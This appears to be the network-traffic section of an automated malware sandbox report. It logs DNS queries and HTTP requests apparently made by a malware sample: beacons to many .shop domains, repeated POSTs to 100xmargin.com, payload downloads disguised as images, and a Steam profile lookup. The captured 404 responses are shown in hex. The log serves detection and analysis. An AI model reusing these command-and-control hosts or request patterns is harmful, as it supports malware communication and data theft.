Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: writerospzm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deallerospfosu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bassizcellskz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: languagedscie.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: complaintsipzzx.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quialitsuzoxm.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tenntysjuxmz.shop
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jtjqwjwvmfygnuav.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://boxojcljwlovjo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybcrnlpbrukjlme.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kovxkdviapxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnnisollkivyeq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jbjrschlkljuccuw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gkfddrcydpdijc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://csgncofvxcv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gmuqjionewdc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lxirtptkcykkr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dajceptfmjkh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://riwgwvjrbnmwo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nlcihkcpqxmi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ykdamwdnhbwpknpg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://snmklddnlivyu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dlmvqfjbkpla.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tmkcjriymiwrj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prlieqcsxkp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://osgexwvtdnb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rklgwxcehosl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://crtlcijemvyx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eodueolaaev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://naeduqoyqokl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wipabeoxyiindo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jehaldxqvvea.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://urtrdmlxhbyurook.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lliabotheqxncloc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kjgfasvdoxofbfqb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://djwjxjenyqhjtklo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xmrxamwxfvkybcwf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://docehetfrtjrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qnwpuvrofdmbcpnt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hhjnintgajpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jxrfghxdpppsidad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: 100xmargin.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qjklivdfirkmv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: 100xmargin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic2.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic5.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: mzxn.ru
Source: global traffic	DNS traffic detected: DNS query: 100xmargin.com
Source: global traffic	DNS traffic detected: DNS query: mussangroup.com
Source: global traffic	DNS traffic detected: DNS query: oytrtojfgh.asia
Source: global traffic	DNS traffic detected: DNS query: mundoparachicas.space
Source: global traffic	DNS traffic detected: DNS query: bassizcellskz.shop
Source: global traffic	DNS traffic detected: DNS query: celebratioopz.shop
Source: global traffic	DNS traffic detected: DNS query: writerospzm.shop
Source: global traffic	DNS traffic detected: DNS query: deallerospfosu.shop
Source: global traffic	DNS traffic detected: DNS query: mennyudosirso.shop
Source: global traffic	DNS traffic detected: DNS query: languagedscie.shop
Source: global traffic	DNS traffic detected: DNS query: complaintsipzzx.shop
Source: global traffic	DNS traffic detected: DNS query: quialitsuzoxm.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: tenntysjuxmz.shop

Source: unknown

HTTP traffic detected: POST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: mundoparachicas.space

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 